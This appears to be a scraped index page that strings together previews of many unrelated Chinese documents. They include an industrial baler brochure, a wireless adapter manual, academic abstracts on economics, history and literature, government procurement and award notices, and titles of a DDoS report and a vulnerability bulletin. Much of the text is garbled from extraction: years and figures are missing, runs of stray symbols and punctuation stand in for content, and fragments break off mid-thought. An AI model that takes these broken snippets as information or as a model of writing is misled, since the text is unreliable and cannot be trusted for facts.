137677_Eta_press Folder-cn用的.indd 美卓回收业务线废金属打包机林德曼 EP 系列金属打包机 ( Lindemann Eta Press ) 2 MINAO SAWES Eta Press 1920 1921 1922 1923 1924 1925 1926 1927 1928 1929 1930 1931 1932 1933 1934 1935 1936 1937 1938 1939 1940 1941 1942 1943 1944

More information

http://www.tenda.com.cn Tenda 无线网卡说明书 第一章产品简介...1 1.1...1 1.2...1 1.3...1 1.4...2 1.5...2 1.6...2 1.7...4 第二章安装指南...5 第三章使用系统自带的无线配置程序...10 3.1...10 第四章客户端应用程序使用...18 4.1...19 4.1.1...20 4.1.2...21 4.1.3...23

More information

é ê

é ê 廖光洪 朱小华 杨成浩 徐晓华 基于南海 年夏季调查航次诊断计算的流函数场 选取越南以东偶极子发生海域 进行 不同的声层析观测站位设置实验 模拟计算声线传播时间信息 然后应用基函数重建方法进行了 流函数场的模拟反演研究 讨论了不同随机观测误差对反演结果的影响 研究结果表明该方法是 可行的 在所选取的约 海域内 在观测海域外围配置 个声层析观测站位就能够很好地重构原流函数场 空间分辨率约为 可以分辨模拟海域中尺度涡场结构

More information

. ( ) (.).,,,. ( ) (.). ( ). ( ) (.). ( ) (.).. ( ) ( ) ( ) ( ) ( ) ( ) ( ).. ( ) (.). ( - ) ( ) (.)., ( ).,,,,.. ( ) ( ) ( ) ( ) ( )... ( )... ( ) (

. ( ) (.).,,,. ( ) (.). ( ). ( ) (.). ( ) (.).. ( ) ( ) ( ) ( ) ( ) ( ) ( ).. ( ) (.). ( - ) ( ) (.)., ( ).,,,,.. ( ) ( ) ( ) ( ) ( )... ( )... ( ) ( ..., 朱相云杜玉芬 (, ) 人们对外来种的研究给予较大的关注, 尤其在研究外来种的适应机理和生存机制方面进行了一些探讨和研究 基于这样的背景, 本文作者对我国豆科植物外来种进行了全面的整理, 对一些种类进行了详实的考证, 并以 馆藏标本为蓝本, 对部分种类的原产地进行了核实和 确认 中国豆科植物外来种有 属 种 ( 含亚种及变种 ) 外来种 ; 豆科 ; 中国 - - (,, ). -.,,

More information

温州市政府分散采购

温州市政府分散采购 温 州 市 政 府 分 散 采 购 招 标 文 件 招 标 编 号 :F - G B 2 0 1 6 0 3 1 4 0 0 4 7 招 标 项 目 : 温 州 市 人 民 政 府 办 公 室 政 务 云 平 台 ( 重 ) 招 标 方 式 : 公 开 招 标 招 标 人 : 温 州 市 人 民 政 府 办 公 室 招 标 代 理 : 二 〇 一 六 年 三 月 目 录 投 标 保 证 金 办 理

More information

Conductix-Wampfler Inductive Power Transfer IPT 2

Conductix-Wampfler Inductive Power Transfer IPT 2 IPT 产品简介 非接触式动力和数据传输系统 Conductix-Wampfler Inductive Power Transfer IPT 2 Conductix-Wampfler Inductive Power Transfer IPT 3 9 1 2 3 4 5 6 7 8 4 2 3 4 1 8 5 7 9 6 ² ² ² - 无限的应用可能性... 用于变速箱总装线上的 AGV 小车

More information

国际政治科学 ¹ º ¹ º

国际政治科学 ¹ º ¹ º 印度学者对中国的安全认知 司乐如 一轨 外交和 二轨 外交都是国际关系研究中值得重视的内容 前者有助于说明两国在政府外交层面的表现 对后者的研究则有助于了解在外交现象背后起作用的观念因素 本文的研究试图把社会心理学中的一些核心概念融入国际关系的研究之中 并在此基础上探讨印度学者对中国的安全认知 本文通过提供关于 认知 的更为精确的概念和理论框架 并通过术语统计和定性的案例分析 深入印度专家的视角 深化人们对中印安全互动的了解

More information

论高校薪酬制度改革与人才强校战略 三 实施薪酬制度改革的效果 分配制度的改革就是在提高广大职工收入水平的基础上 重点要提高拔 尖人才的工资性收入及各种福利待遇 自从实施薪酬制度改革以来 我校职 工的工资性收入普遍有了大幅度的提高 薪酬改革方案得到了广大教师的支 持和欢迎 根据我们的调查 自 1999 年薪酬制度改革以来我校职工的工资性 收入增长了近 3畅 5 倍 具体增长情况见下图 1 图 1 1999

More information

外国文学研究 年第 期

外国文学研究 年第 期 柳向阳 论奥古斯丁时间观与罗伯特 潘 沃伦的诗歌创作 柳向阳 在 世纪美国作家中 罗伯特 潘 沃伦以博学多才的文艺复兴式人物著称 但沃伦文学生涯的核心成就是在诗歌领域 在六十余年的诗歌生涯中 沃伦有意识地将 奥古斯丁时间观引入诗歌创作 一方面借鉴奥古斯丁时间的结构特征 通过探索时间向度的变化 展示生命的历程和自我的发现 另一方面挖掘奥古斯丁时间的生命和诗学内涵 通过 对时间的体验 将时间的心灵和生命的属性赋予诗歌中的人和物

More information

¹

¹ 复仇母题与中外叙事文学 杨经建 彭在钦 复仇是一种特殊的历史文化现象 也是以超常态的 极端性方式为特征的人类自然法则的体现 而在中外叙事文学中以 复仇 为取向的创作大致有三种母题形态 血亲复仇 痴心女子负心汉式复仇 第三类复仇 本文在对这三类复仇叙事模式进行艺术解析的前提下 发掘并阐释了蕴涵其中的不同民族的文化精神和价值指向 复仇母题 叙事文学 创作模式 文化蕴涵 ¹ º » ¼ ½ ¹

More information

论中日 囚徒困境 的存在及逃逸 马亚华 本文试图用博弈论方法分析中日关系发生困难的原因 并在此基础上提出一点解决问题的思路 目前中日关系已在重复博弈中陷入了 囚徒困境 状态 囚徒困境 不仅为第三方势力提供了渔利的空间 直接损害了两国战略利益 而且其 溢出效应 还损害了全体东亚人民的利益 只有透过中国和平发展的参照系考察中日关系的过去 现在和未来 才能把握当前中日关系困难的本质并找到解决问题的办法 当前中日两国的综合国力基本处于同一层次

More information

潘军昌等 关系型借贷 破解 三农 融资难题的技术选择 二 关系型借贷 三农 融资的核心机理 三 关系型借贷 破解 三农 融资难题的技术选择

潘军昌等 关系型借贷 破解 三农 融资难题的技术选择 二 关系型借贷 三农 融资的核心机理 三 关系型借贷 破解 三农 融资难题的技术选择 农业经济问题 月刊 年第 期 潘军昌 高名姿 陈东平 三农 融资难题牵扯层面繁多 研究的角度不同 结论也是大相径庭 本文从融资技术的角度发现 民间金融活动中所使用的关系型借贷技术可以有效解决 三农 融资过程中面临的信息不对称 缺乏抵押品问题 从而有效缓解 三农 融资难题 三农 融资 软信息 关系型借贷 一 一个案例解读 作者单位 王学渊 浙江大学农业现代化与农村发展研究中心 杭州 赵连阁 浙江工商大学经济学院

More information

经济学动态 年第 期,,,,,, :,,,,, ( ),, ( ) :? ( ),, :, ` ', ( ),,,, : ` ',, ( ), :?, :,,,, ( ), : ( ),, -,,,,,,, ;,?,,,

经济学动态 年第 期,,,,,, :,,,,, ( ),, ( ) :? ( ),, :, ` ', ( ),,,, : ` ',, ( ), :?, :,,,, ( ), : ( ),, -,,,,,,, ;,?,,, 吴易风 : 本文考察了当前金融危机和经济危机背景下西方经济思潮的新动向 : 对资本主义 的反思和对 新资本主义 的构想 ; 对新自由主义的反思和对新国家干预主义的构想 ; 对自由市场经 济体制与政策体系的反思和对 市场与政府平衡 的市场经济体制与政策体系的构想 ; 对经济全球化的反思和对全球经济新秩序的构想 ; 对西方经济学的质疑和对马克思经济学的再认识 本文最 后对西方经济思潮的新动向作了分析和评论

More information

<4D F736F F D20D6D0B9FABDF0C8DAC6DABBF5BDBBD2D7CBF9D6B8B6A8B4E6B9DCD2F8D0D0B9DCC0EDB0ECB7A8>

<4D F736F F D20D6D0B9FABDF0C8DAC6DABBF5BDBBD2D7CBF9D6B8B6A8B4E6B9DCD2F8D0D0B9DCC0EDB0ECB7A8> 2013 8 14 2015 4 3 10015000 10003 600 3 ; 3 5 ; 3 ; ; ; ; ; 3 1 5 7*24 3 3 5 1 ; 1 3 1 10 3 2015 4 3 1 期货保证金存管业务资格申请表 申请人全称注册地址注册资本邮政编码法定代表人姓名企业法人营业执照号码金融业务许可证号码存管业务负责部门联系电话传真电话姓名 存管银行业务负责人 部门及职务 联系方式

More information

研究问题 自主学习中心 研究对象 研究方法 自主学习中心参与度以及学生对其认可度

研究问题 自主学习中心 研究对象 研究方法 自主学习中心参与度以及学生对其认可度 自主学习环境下的学习策略研究 谈言玲 张荣根 严 华 学习策略的使用一般可视作学习者自主学习能力强弱的标志 本研究采用问卷和访谈结合的方式调查了自主学习环境下学习策略的使用情况 结果显示 自主学习中心参与度和认可度不高 大多数学 生能有效运用一定的认知策略 但元认知策略和社交策略运用程度偏低 学习策略 自主学习 本文为江苏省教育科学 十一五 规划 项目课题成果之一 课题号 同时感谢匿名审稿专家提供的宝贵修改意见

More information

美国智库对当前中美关系的评析综述 卢 静 美国智库在美国对外政策的分析和制定中发挥着十分重要的作用 美国智库认为 美中关系是 世纪最重要的双边关系之一 而依存与合作是当前新形势下美中关系的主轴 其中合作是竞争性的 美国智库建议美国政府通过 巧实力 外交 全面接触 中国 其短期目的是让中国承担更多的 国际责任 而长远目标是塑造和改变中国 美国智库 中美关系 竞争性合作 卢静 外交学院国际关系研究所副教授

More information

旅游科学

旅游科学 旅 游 科 学 王春雷 会展专业人才培养模式是一个院校对于会展办学的整体设计 因而需要进行系统性的构建 但目前这方面的研究成果不多 更缺乏实证性的研究 本 文基于文献综述的发现和会展专业的特点 从理论上构建了一个项目驱动型会展 专业人才培养模式的基本框架 进而以上海师范大学会展经济与管理专业为例 侧重从教育理念 培养目标 培养过程 培养制度和培养评价等方面进行了实证研究 项目驱动型 会展专业 人才培养模式

More information

# # +,! +,!!!!!!!! #!!

# # +,! +,!!!!!!!! #!! 江红英 国民政府在抗战这一特殊时期 面对战争带来的新情况 顺应时势需要 将职业介 绍管理作为政府的一项常态工作 采取了许多发展职业介绍的措施 如设专门机构管理 办理难民 职业介绍 发展公立职业介绍机构 加强对私人职业介绍机构的管理 指导职业介绍机构规范化运 作等 从效果上看 职业介绍对解决失业者的就业难题有所帮助 但职业介绍的作用因各种原因而 有限 特别是政府赋予职业介绍以沉重的社会责任 这是当时历史条件下不可能实现的

More information

北京市人民政府关于 2013年度北京市科学技术奖励的决定 各区 县人民政府 市政府各委 办 局 各市属机构 为深入贯彻落实党的十八大和十八届三中全会精神 加快健全技术创新市场导向机 制 市政府决定 对在发展首都科技事业 促进首都经济社会发展中取得突出成绩的科 技人员和组织予以奖励 根据 北京市科学技

北京市人民政府关于 2013年度北京市科学技术奖励的决定 各区 县人民政府 市政府各委 办 局 各市属机构 为深入贯彻落实党的十八大和十八届三中全会精神 加快健全技术创新市场导向机 制 市政府决定 对在发展首都科技事业 促进首都经济社会发展中取得突出成绩的科 技人员和组织予以奖励 根据 北京市科学技 2013 年 北 京 市 科 学 技 术 奖 励 公 报 北 京 市 人 民 政 府 二 〇 一 四 年 一 月 1 北京市人民政府关于 2013年度北京市科学技术奖励的决定 各区 县人民政府 市政府各委 办 局 各市属机构 为深入贯彻落实党的十八大和十八届三中全会精神 加快健全技术创新市场导向机 制 市政府决定 对在发展首都科技事业 促进首都经济社会发展中取得突出成绩的科 技人员和组织予以奖励 根据

More information

二 政府事权划分标准的理论分析 一 公共物品受益理论

二 政府事权划分标准的理论分析 一 公共物品受益理论 董建新 李叶兰 一 问题的提出 二 政府事权划分标准的理论分析 一 公共物品受益理论 二 政府职能分工理论 三 委托 代理理论 三 政府行政审批事权划分标准的实证分析 一 分析样本 二 有哪些标准 作用范围标准 职能分工层次标准 事务性质层次标准 事务等级标准 数量标准 其他标准 三 如何使用标准 部门分析 事项分析 四 结论 四 对纵向政府间事权划分标准的建议 一 构建多重标准体系 实现事权划分的动态调整

More information

经 济理论与经 济管理 第 期 我 国 汽 车产 业 政 策 和 发 展 战 略 陈建 国 国 家 发 展 与 改 革 委 员会 工 业 司 张宇贤 北京 国 家信 息 中心 发 展 研 究 部 实现 利 润 总 额 结构调整步 伐加快 我 国 汽 车产 业 发 展 基 本 情 况 加人 以来 在 投 资 消 费 的双 重拉 动下 国 汽 车产 业 摆 脱 了 长 达 了 个 快 速 发 展 阶段

More information

( ),, :1 : : ( ), 2 :, 3 : ( ), 4 : 5 : :, 6 :,,,,,,,,, :,,,.....,,,, 1, ;2,

( ),, :1 : : ( ), 2 :, 3 : ( ), 4 : 5 : :, 6 :,,,,,,,,, :,,,.....,,,, 1, ;2, 张 翼 本文对近年来我国人口出生性别比失衡原因作了社会学意义的探索和研究 认为家族主义与以家庭为最小生产单位的农业劳作方式, 家庭人口再生产对男婴的需 求与国家人口再生产对出生人数的限定, 以及妇女经济地位的相对低下等, 是造成出 生性别比升值的基本社会动因 指出, 在影响人口再生产的三只手 国家 家庭和市场中, 惟有借助于国家强有力的调控手段, 才能使失衡的出生性别比在短期内渐次 回落 作者 :

More information

年第 期 1 :,,,,,,,,,,? :,, :. ( ) :, ( ) :, ( ) : :,. : :, 1,,, ;,,,,, :,,,,,,

年第 期 1 :,,,,,,,,,,? :,, :. ( ) :, ( ) :, ( ) : :,. : :, 1,,, ;,,,,, :,,,,,, 冯国栋 在汉文佛教文献研究与整理工作取得相当成绩的今天, 有必要建立一门专门处理汉 文佛教文献的学科, 即汉文佛教文献学 本文初步提出汉文佛教文献学的概念, 并在此 基础上初步建构了汉文佛教文献学的学科体系, 认为汉文佛教文献学应由实体层面 方 法层面 历史层面与理论层面四部分的研究组成 关键词 : 汉文佛教文献学必要性体系 作者冯国栋, 年生, 文学博士, 浙江大学古籍研究所副教授,, 1 :,

More information

三国时期墓葬特征述论 韩国河 朱 津 三国时期墓葬制度是从 汉制向 晋制的转变过渡时期 这一时期墓葬形制同东汉时期相比有较大的改变 突出表现在曹魏和东吴地区 随葬器物组合方面基本沿用东汉晚期 但又 出现了一些新器型 此外各区域间的墓葬文化表现出频繁交流的特点 综合以上诸要素可知 晋制 的形成主要源自于中原地区的曹魏墓葬 种类亦被中原地区所接纳 成为西晋墓中典型的器物组合 三国 汉制 薄葬 晋制 突出表现在墓葬形制和葬俗方面

More information

第四章 102 图 4唱16 基于图像渲染的理论基础 三张拍摄图像以及它们投影到球面上生成的球面图像 拼图的圆心是相同的 而拼图是由球面图像上的弧线图像组成的 因此我 们称之为同心球拼图 如图 4唱18 所示 这些拼图中半径最大的是圆 Ck 最小的是圆 C0 设圆 Ck 的半径为 r 虚拟相机水平视域为 θ 有 r R sin θ 2 4畅11 由此可见 构造同心球拼图的过程实际上就是对投影图像中的弧线图像

More information

WDR 2010 EAP booklet CH.indd

WDR 2010 EAP booklet CH.indd 东亚与太平洋地区 气候变化要求变革 Act Now, Act Together, Act Differently 2 行动的理由 规划未来 3 气候变化 : 对增长与福祉的威胁 4 5 促进气候智能型增长 6 7 减少对气候变化的脆弱性 8 9 扩大气候变化融资规模 10 11 发明推广气候智能型技术 12 2010 年世界发展报告发展与气候变化 http://www.worldbank.org/wdr2010

More information

,,, ( ) ( ), ( ), ( ), :,,, ( ), (, ) :,,, ( ), ( ) ( - ) :,,,,, ( ), ( ) ( ), ( ), :, ;,,, ( ), ( ), ( ), (, ), ( )( ) :,,,,,,,, ( ),,,,, ;,,,, ( ) :

,,, ( ) ( ), ( ), ( ), :,,, ( ), (, ) :,,, ( ), ( ) ( - ) :,,,,, ( ), ( ) ( ), ( ), :, ;,,, ( ), ( ), ( ), (, ), ( )( ) :,,,,,,,, ( ),,,,, ;,,,, ( ) : : 李明欢 内容提要 : 本文以对身处欧洲的温州移民的经验研究为基础, 提出对 跨国移民 的研究, 不能基于单一理论进行阐述, 除了考察他们迁移的经济动因外, 还要考察 文 化小传统 的影响 ; 而在长期移民历史中形成的社会网络, 则成为信息传递和移居治 业的桥梁,,,,,,, 1,, :, ;, ( &,, - ),,, ; ( - ),,,, 2,,,, ( ), 1 2,,,,,, : :,

More information

文化遗产的法律保护始于近代西方国家 现代以来呈现出法典化 系统化趋势 法国文化遗 产法历经两百多年的发展 迄今已形成以 遗产法典 为核心 以物质文化遗产保护为主体的比较完善的 法律保护体系 颇具典型性 法国文化遗产法律保护在立法体系 制度设计 理念应用等方面的经验 对于完善和发展中国文化遗产法律保护具有重要的借鉴意义 法国 文化遗产 法律保护 中国 借鉴 叶秋华 中国人民大学法学院教授 博士生导师

More information

untitled

untitled 65 114 1 2 3 1 96.49% 89.47% 68.42% 62.28% 42.98% 32.46% 26.32% 14.04% 13.16% 120.00 100.00 80.00 60.00 40.00 20.00 0.00 89.47 96.49 62.28 68.42 14.04 26.32 13.16 42.98 32.46 1 2 73.68% 63.16% 56.14% 36.84%

More information

国 内 多 数 企 业 属 于 e-hr 普 通 玩 家 国 内 多 数 企 业 属 于 e-hr 普 通 玩 家 国 内 多 数 企 业 的 e-hr 属 于 第 二 或 第 三 阶 段 比 如 A 集 团 公 司 是 国 内 知 名 的 汽 车 企 业, 人 力 资 源 部 门 有 100 名

国 内 多 数 企 业 属 于 e-hr 普 通 玩 家 国 内 多 数 企 业 属 于 e-hr 普 通 玩 家 国 内 多 数 企 业 的 e-hr 属 于 第 二 或 第 三 阶 段 比 如 A 集 团 公 司 是 国 内 知 名 的 汽 车 企 业, 人 力 资 源 部 门 有 100 名 未来 e-hr 领域的员工服务分水岭 智能服务 VS 自助服务 人工智能 SaaS 软件即服务 等为代表的新技术应用于人力资源管理 是用工具 和软件进行员工信息记录和薪酬计算 是把绩效 培训等模块串联成一个系统 是定 义为人力资源管理者工作的平台 服务于业务部门主管 将数据整合 亦或是升格为 真正的决策平台 这像是 e-hr 发展的完美四阶段 国 内 多 数 企 业 属 于 e-hr 普 通 玩 家

More information

! %! &!! % &

! %! &!! % & 张海峰 姚先国 张俊森 借鉴 的有效教育概念 本文利用 年间的中国省级面板数据估计了平均教育年限 教育数量 和平均师生比率 教育质量 对地区 劳动生产率的影响 本文的实证分析结果表明 以师生比率衡量的教育质量对劳动生产 率有显著且稳健的正效应 在均值处师生比率每上升一个标准差 有助于提高地区劳动生产率约 教育数量对劳动生产率的影响大小部分取决于教育质量的高低 教育质量越高教育数量对劳动生产率的促进效应越大

More information

总量开始减少的欧洲人口形势分析

总量开始减少的欧洲人口形势分析 总量开始减少的欧洲人口形势分析 张善余 彭际作 俞 路 自 世纪 年代以来 欧洲人口增长率持续下降 年人口开始负增长 这无疑是其人口发展的一个转折点 在欧洲各个地区中 东欧是 年以前全球第一个也是仅有的一个人口有所减少的地区 在北欧和西欧地区 如果没有国际移民的净流入 人口增长率也将很低 大约在 年间 预计欧洲所有地区的人口都将出现负增长 由于自然增长率在过去一个世纪乃至未来的变动 欧洲人口已不可逆转地老龄化

More information

第六章 按摩与保健 205 图 6唱 17 常用穴位示意图 三 选穴原则 穴位按摩是针对穴位进行点 按 揉 推等多种手法的刺激 引起局部出现 酸 麻 胀 痛或温热感觉 一般每天按摩 1 2 次 每次可选用 3 6 个 对 穴 位交替进行按摩 同时 穴位的选择应根据人体的体质和病情 从全身的穴位中 选出一些对某种病症有效的穴位 也称配穴 才能达到应有的治疗效果 一 一般规律 虽然全身的穴位很多 每个穴位的主治功能又有不同

More information

中华人民共和国国家标准批准发布公告 作者 : 国家质量监督检验检疫总局, 国家标准化管理委员会 作者单位 : 刊名 : 中国标准化 英文刊名 : CHINA STANDARDIZATION 年, 卷 ( 期 ): 2009,(5) 被引用次数 : 0 次 本文链接 :http://d.wanfangdata.com.cn/periodical_zgbzh200905013.aspx 授权使用 : 数字出版事业部

More information

二人转是东北的民间艺术, 早在 1953 就曾经走出国门进行演出 近年来, 二人转还担负了传播中华文化的重要使命, 国家汉办 / 孔子学院总 部等相关部门组织了大量的国际性演出在拓展海外演出市场的过程中, 国 有院团与民营团体进行联合, 积累了宝贵的经验电视传媒推动了二人转的 发展, 中央电视台及地方台播出的大量综艺晚会 访谈节目及影视剧进一步 扩大了二人转的知名度和影响力二人转的艺术元素被应用于商业广告

More information

Cisco WebEx Meetings Server 2.6 版常见问题解答

Cisco WebEx Meetings Server 2.6 版常见问题解答 Cisco WebEx Meetings Server 2.6 版 常 见 问 题 解 答 介 绍 2 应 用 程 序 和 文 档 共 享 2 主 持 加 入 和 设 置 会 议 2 在 Chrome 和 Firefox 上 加 入 WebEx 会 议 或 播 放 会 议 录 制 文 件 4 适 用 于 移 动 设 备 的 Cisco WebEx 4 下 载 Cisco WebEx 应 用 程 序

More information

抗日战争研究 # 年第 期 % & # # #

抗日战争研究 # 年第 期 % & # # # 论抗日根据地兵器工业的建立与兵工企业之运作 曹敏华 抗日战争初期 八路军 新四军及各地人民抗日武装先后办起 多家修械所和炸 弹厂 修理军械 制造兵器 为根据地兵器工业的建立奠定了基础 随着战局的推展 根据地兵器工业逐步发展 呈现出诸多鲜明特征 抗日根据地实行军区 军分区和县武装部三结合的兵工生产体 制 通过颁布有关军事后勤工作的条例和兵工生产的训令 规章等 建立相应的职能部门 实行严格 的管理制度

More information

,,,,. %,,,. %, %, %,, ( ) ( ) % ( ) % % ( )* % ( )* % ( ) % ( )* % ( )* % ( ) % ( ) % ( ) % ( ) % ( ) % ( ) ( ) % ( ) % ( ) % % ( )* % ( )* % ( )* % (

,,,,. %,,,. %, %, %,, ( ) ( ) % ( ) % % ( )* % ( )* % ( ) % ( )* % ( )* % ( ) % ( ) % ( ) % ( ) % ( ) % ( ) ( ) % ( ) % ( ) % % ( )* % ( )* % ( )* % ( 区位学理论思考 潘允康 [ 美 ] 约翰. 罗根 [ 美 ] 边馥琴 [ 美 ] 边燕杰关颖卢汉龙 过去在理论界研究中国家庭结构特点的影响因素时主要从中国的家庭传统和社 会现实生活需求两方面展开, 本文则在此基础上集中从住房的角度分析家庭结构的 影响因素 它依据 年在津 沪两地进行的住房与家庭生活调查的有关资料, 运 用区位学理论, 指出住房是影响中国家庭模式的重要因素, 随着城市居民住房状况的改变和住房政策的变化,

More information

从制度视角看马来西亚华人的参政空间 朱陆民 华人参政是华人维护自身政治 经济利益的必经之路 基于马来西亚历史 文化传统的主要制度结构从根本上影响和制约着华人参政的广度和深度 本文从新制度主义政治学的视角对马来西亚影响 制约华人参政的主要制度进行了剖析 由此揭示了华人在马来西亚的参政空间 作者认为 华人的政治参与是一个非常复杂的问题 制度的视角或许并不能解释该问题的全部 但制度的性质从根本上决定着华人参政的前景和命运

More information

浙江 云南 山西 学院 最高分 最低分 一本线 二本线 最高分 最低分 一本线 二本线 最高分 最低分 一本线 二本线 机械工程 能源与环境系统工程 机械设计制造及其自动化

浙江 云南 山西 学院 最高分 最低分 一本线 二本线 最高分 最低分 一本线 二本线 最高分 最低分 一本线 二本线 机械工程 能源与环境系统工程 机械设计制造及其自动化 2015 年上海工程技术大学本科分数线查询 学院 湖南辽宁新疆 最高分最低分一本线二本线最高分最低分一本线二本线最高分最低分一本线二本线 机械工程 468 458 446 381 能源与环境系统工程 504 501 500 419 449 444 446 381 机械设计制造及其自动化 ( 现代装备与控制工程 ) 计算机科学与技术 自动化 535 534 526 455 475 449 446 381

More information

片 要求小王等同学对这些文物用两种不同的标准进行分类 说出分类标准和结果 其所考查的目标实则是呼应了一般学习能力中的 整理信息 的要求 即从图片材料 中提取历史信息 对所获材料进行归类 开卷的第三题以 古代少数民族问题 为材料主题 体现交往与融合在文明发展 历程中的地位与作用 以探究性学习为主线 集中考查学生在开展探究性活动中对文 献 实物 口传等不同种类史料 材料 的运用水平 包括对有关史实的再现

More information

第 期 丘志力等 从传世及出土翡翠玉器看我国清代翡翠玉料的使用

第 期 丘志力等 从传世及出土翡翠玉器看我国清代翡翠玉料的使用 第 卷 第 期 年 月 宝石和宝石学杂志 丘志力 吴 沫 谷娴子 杨 萍 李榴芬 根据最新发现的广州海关清代同治 光绪年间玉石的进口记录以及其它翡翠资源开发的资料 通 过分析中国主流博物馆清代传世及出土的翡翠玉器 国际著名拍卖公司专场拍卖的清代翡翠玉器以及云南 等九省 市出土的清代翡翠玉器 统计分析了中国清代翡翠玉器的来源与材质特征 指出该时期进入中国市场 的翡翠玉料数量可能相当巨大 广州是翡翠玉料最重要的进关口岸之一

More information

2015绿盟科技DDoS威胁报告

2015绿盟科技DDoS威胁报告 2016 绿 盟 科 技 关 于 中 国 电 信 云 堤 2008 年 以 来, 中 国 电 信 开 始 着 力 于 网 络 DDoS 攻 击 防 护 能 力 建 设, 已 形 成 了 覆 盖 国 内 31 省 和 亚 太 欧 洲 北 美 等 主 要 POP 点 的 一 体 化 攻 击 防 御 能 力 2014 年, 中 国 电 信 首 次 在 业 界 系 统 性 提 出 电 信 级 网 络 集 约

More information

李俊新 崔 敏 刘艳春 姚艳君 周广芬 孙 宝 河北科技大学理学院 河北石家庄 滦南县职业教育中心基础部 河北滦南 在物理化学实验的基础上 对一级反应的 种不同数据处理模型进行比较和分析 通过对 实验数据处理模型进行系统的比较 来改善传统实验数据处理中存在的一些问题 从而简化数据处 理 减小作图工作量与作图误差 提升实验水平 提高数据处理结果的准确性 一级反应 数据处理模型 过氧化氢 图 过氧化氢分解实验装置图

More information

C ONTENTS 目 录 热 点 舆 情 消 息 海 外 来 风 56 Win10 周 年 更 新 再 出 BUG: 竟 没 有 关 机 按 钮 57 谷 歌 为 MacOS 开 发 的 恶 意 软 件 嗅 探 器 即 将 完 成 58 数 据 安 全 公 司 Imperva 财 报 不 佳? 被

C ONTENTS 目 录 热 点 舆 情 消 息 海 外 来 风 56 Win10 周 年 更 新 再 出 BUG: 竟 没 有 关 机 按 钮 57 谷 歌 为 MacOS 开 发 的 恶 意 软 件 嗅 探 器 即 将 完 成 58 数 据 安 全 公 司 Imperva 财 报 不 佳? 被 C ONTENTS 目 录 2016 年 08 月 3 刊 总 第 292 期 主 办 中 国 信 息 安 全 博 士 网 协 办 国 工 信 科 技 发 展 ( 北 京 ) 有 限 公 司 安 全 圈 总 编 辑 刘 晴 执 行 主 编 扶 苏 编 辑 部 焦 耐 龙 宋 玉 婷 美 术 编 辑 迟 涛 特 约 记 者 边 锋 郭 子 扬 网 址 www.secdoctor.com 广 告 发 行

More information

近代史研究 年第 期

近代史研究 年第 期 龚 关 清末到民国前期是华北集市的一个重大发展时期 表现为集市数量大幅度增加 集市网络层级结构更加分明 其功能也有重大变化 同时 这一时期也正是华北地区集镇的勃兴时期 集市的发展和集镇的勃兴同步进行 集镇的勃兴并没有使集市黯然失色 集市依然扮演着重要的角色 这既是华北地区在近代尤其是清末到民国前期商品化快速发展的一个侧面反映 也是华北区域市场发展迥异于江南地区的一个特点 近代华北地区集市 近代史研究

More information

Ñ Ö Ö

Ñ Ö Ö Ö Ö Ö Ñ Ö Ö Ö Ö Ö Ö Ñ Ö Ö Ù Ñ Ö Ö Ñ Ö Ö Ö Ö Ö Ö 中国药典 年版药用辅料标准起草工作交流会 月 日于西宁召开 国家药典委员会于 年 月 日组织承担药用辅料标准起草任务的 个药品检验所在青海省西宁市召开辅料 标准起草工作交流会 国家局药品注册司派员参加了会议 青海省食品药品监督管理局魏富财副局长到会致欢迎词 中国药 品生物制品检定所和上海市食品药品检验所就药用辅料标准起草工作进行了大会经验交流

More information

安全公告

安全公告 信 息 安 全 漏 洞 威 胁 通 报 第 1 页 共 60 页 信 息 安 全 漏 洞 威 胁 通 报 安 恒 信 息 信 息 安 全 漏 洞 威 胁 通 报 2016 年 第 32 期 2016.08.18-2016.08.24 根 据 中 国 国 家 信 息 安 全 漏 洞 库 统 计, 本 周 共 收 集 整 理 信 息 安 全 漏 洞 189 个, 其 中 高 危 漏 洞 81 个 中 危

More information

珮云 珮云 邓小平的这段批示 使他成为第一个明确倡导节制生育的国家领导人 周恩来后

珮云 珮云 邓小平的这段批示 使他成为第一个明确倡导节制生育的国家领导人 周恩来后 国家人口计生委原办公厅主任 中国计生协会原副会长 珮云 珮云 邓小平的这段批示 使他成为第一个明确倡导节制生育的国家领导人 周恩来后 珮云 珮云 刘少 珮云 珮云 卫生部门应该协同有关方面对节育 珮云 珮云 珮云 畊等 人在政协二届三次会议上的联合发言 积极提倡晚婚 避孕和计划生 珮云 这个指示 珮云 珮云 珮云 珮 珮云 国家人口和计划生育委员会编 中国人口和计划生育史 中国人口出版社 彭珮云主编

More information

抗战时期沦陷区的电影检查 #

抗战时期沦陷区的电影检查 # 汪朝光 抗战时期 日本扶植的沦陷区伪政权实行了不同形式的电影检查 从沦陷初期各地各自为政的电影检查 到沦陷中后期分别集中于汪伪 华北和东北三个伪政权统治地域内的统一电影检查 从汪伪政权表面上沿袭国民政府的电影检查制度 到华北伪政权另行自己的电影检查 再到东北伪政权基本上照搬日本电影检查制度 但万变不离其宗 沦陷区电影检查的实质是为日本侵略中国服务的 是为了禁止可能出现的反映中国人民的反抗意识 独立精神和民族感情的影片

More information

简 介

简 介 www.advantech.com.cn 简 介 简 介 完 全 基 于 浏 览 器 的 人 机 界 面 / 远 端 监 控 及 数 据 采 集 (HMI/SCADA) 软 件 研 华 WebAccess 是 一 款 完 全 基 于 网 络 人 机 界 面 / 远 端 监 控 及 数 据 采 集 (HMI/SCADA) 软 件, 具 备 绝 佳 的 连 网 能 力 透 过 WebAccess 网

More information

CH01.indd

CH01.indd 3D ios Android Windows 10 App Apple icloud Google Wi-Fi 4G 1 ( 3D ) 2 3 4 5 CPU / / 2 6 App UNIX OS X Windows Linux (ios Android Windows 8/8.1/10 BlackBerry OS) 7 ( ZigBee UWB) (IEEE 802.11/a/b/g/n/ad/ac

More information

<4D6963726F736F667420576F7264202D20312D3120B9ABBFAAD7AAC8C3CBB5C3F7CAE9A3A8C9EAB1A8B8E5A3A92E646F63>

<4D6963726F736F667420576F7264202D20312D3120B9ABBFAAD7AAC8C3CBB5C3F7CAE9A3A8C9EAB1A8B8E5A3A92E646F63> 广 西 新 豪 智 云 技 术 股 份 有 限 公 司 ( 申 报 稿 ) 推 荐 主 办 券 商 二 〇 一 六 年 一 月 声 明 本 公 司 及 全 体 董 事 监 事 高 级 管 理 人 员 承 诺 不 存 在 虚 假 记 载 误 导 性 陈 述 或 重 大 遗 漏, 并 对 其 真 实 性 准 确 性 完 整 性 承 担 个 别 和 连 带 的 法 律 责 任 本 公 司 负 责 人 和

More information

